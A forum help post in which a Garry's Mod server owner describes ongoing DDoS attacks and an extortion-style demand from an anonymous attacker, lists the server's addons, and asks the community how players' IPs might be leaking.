Possible DDoS exploit left unpatched, users being booted entirely offline after ~10 minutes of play - Help

Possible DDoS exploit left unpatched, users being booted entirely offline after ~10 minutes of play

0 replies, posted
In This Thread

Hey there. I've been having some issues with a server of mine recently which have forced me to temporarily close it down as a result. I've been noticing (and attributing to bad ISPs until recently) users being booted offline after a certain amount of time of playing on my Garry's Mod server. And I mean entirely offline, as I've experienced myself. Usually it's for about 5-10 minutes, with a heavy bit of packet flooding. The first few times, it appeared to be an NTP-reflection attack, but it's since changed. Still some sort of reflection, as I can't seem to find any sort of IP address that would be some kind of personal address. They're all IPs in datacenters and stuff like that, which don't help much. I've been looking through a lot of my Lua scripts and addons to see if any have been compromised, to little avail. No Lua script seems to be making any malicious calls, ie http.Fetch, http.Post, Player:IPAddress, etc. This leads me to believe this is some sort of exploit involving the game itself, which is leaking IPs to the attacker. I've had someone step forward claiming to be the attacker in question, who stated that they demand my server be taken offline and/or switched away from all of three very popular gamemodes: TTT, Murder, and Prophunt. They've warned that the attacks will continue, and possibly intensify, if things get any worse. The problem is, this person is hiding behind a Discord username, running through the Discord web client (I know this because, when I took the Discord invite link away from my Steam group, they stopped joining the Discord server), which makes it very hard to actually get any information on who they might be. I have speculations they may be a rival server owner, even one I may already know, but their only response when I asked them what they wanted when I had a chance to speak with them was "I have my reasons". Claims from this/these attacker(s) range from mere DDoS threats to compromised clients that spread some "virus" around similar to other infections in the past, ie the *cough* *cough* exploit. I've searched through my game files and attempted running multiple viral scans with no results, so I find it improbable that that's the case, but it's still not impossible. I've done some searching through my addons and Lua scripts, as I said, but I've found very little of interest. I haven't been able to search every Workshop addon, and I"m running some stuff off ScriptFodder, but the latter should be clean, and the former addons are used fairly widely. Here's a link to my server's Workshop collection, in case anything stands out (please ignore the server name): [B]Serverside:[/B] [URL]http://steamcommunity.com/sharedfiles/filedetails/?id=345579207[/URL] [B]Clientside:[/B] [URL]http://steamcommunity.com/sharedfiles/filedetails/?id=329047765[/URL] And here's a link to the collection of legacy addons and Lua scripts we have on the server (ScriptFodder addons removed for obvious reasons): [URL]https://www.dropbox.com/s/aa5ct152skdhabq/ponypwn2_game_lua.zip?dl=0[/URL] Some info about my server: [B]Provider: [/B]Nuclear Fallout [B]ScriptFodder Addon List: [/B]- [URL="https://scriptfodder.com/scripts/view/22"]HatsChat 2[/URL] - [URL="https://scriptfodder.com/scripts/view/531"]TTT Battlefield 4 HUD[/URL] (added after attacks started happening) - [URL="https://scriptfodder.com/scripts/view/391"]TTT Custom UI[/URL] - [URL="https://scriptfodder.com/scripts/view/460"]!cake Anti-Cheat[/URL] - [URL="https://scriptfodder.com/scripts/view/32"]Advanced Name Matching for ULX[/URL] - [URL="https://scriptfodder.com/scripts/view/1424"]Wyozi Advanced TTT[/URL] - [URL="https://scriptfodder.com/scripts/view/673"]Atmosphere Airlines[/URL] - [URL="https://scriptfodder.com/scripts/view/326"]Flat Load[/URL] (not on server) At this point, I'm at a loss. As I've said, I've taken the precautionary measure and shut down my server for the time being, as hard as it is. The attacker claims that I have a 30-day grace period, and, if the server has been down for that long, all "infected clients" will be "cleaned", so they can't do anything if they tried. Of course, I have a hard time believing clients are infected anyway, but it doesn't hurt to think worst case scenario. The attacker also claims it is very easy to re-infect my server, basically saying that, if I don't stop using TTT, Prophunt, or Murder, I'm still going to be under fire. Even after the 30 day period. I've made a backup of every server file I'd care about, and dropped them on my drive, which is where the Lua dump came from. If anything comes of this and I'm able to start up again, I'm able. I really do hope something comes of this, because i really love running this community, and to see this happen like this hurts. I can't really report any exact endpoints for any security holes, but I can say there is more than likely one with my server, whether it's on one the addons' ends or the game's. If anyone can offer any help in this situation, that would be nice. One other detail: The attacker also reports to have automated the process of booting users offline with some sort of script, which he claims scans the server by IP or by keyword, and looks for my server. He claims to only be targeting pony servers in those three gamemodes, as those are the gamemodes he claims to play most often. I have little more than that to say about the hacker, other than that they were pretty damn smug about the whole situation. "I hold all the cards now." Heh. Seriously, though. Any help that can be offered is [B]extremely appreciated[/B]. I love my community, love running this server, and I'd hate to see its doors close after almost 4 consecutive years, especially over one person. Right now, I have a very, very weak profile on the attacker, and that most certainly won't hold up in a formal case with authorities. I'm left at a decision with two choices, each with their own flavor of poison: ignore the person and keep the community running, at the cost of users' safety and the risk of the attacks intensifying, or complying, which [B]should[/B] (no guarantees) keep the players safe at the cost of my entire community. Really tough choice there... Thank all of you in advance for any help you can provide. I really hope something comes of this. [B]TL;DR:[/B] Someone is exploiting my server in some way and booting some of my players offline at random intervals after about 5-10 minutes. I can't find any compromised addons, so I think it might be the game's issue. The attacker has revealed very little about themselves, if they are even the attacker, and they're saying some pretty scary (but likely improbable) things. Help is appreciated. [B]Edit:[/B] Something I forgot to mention: The attacker commented on how I'm "still looking at Lua" as if the vulnerability wasn't in Lua, but instead somewhere else.

Sorry, you need to Log In to post a reply to this thread.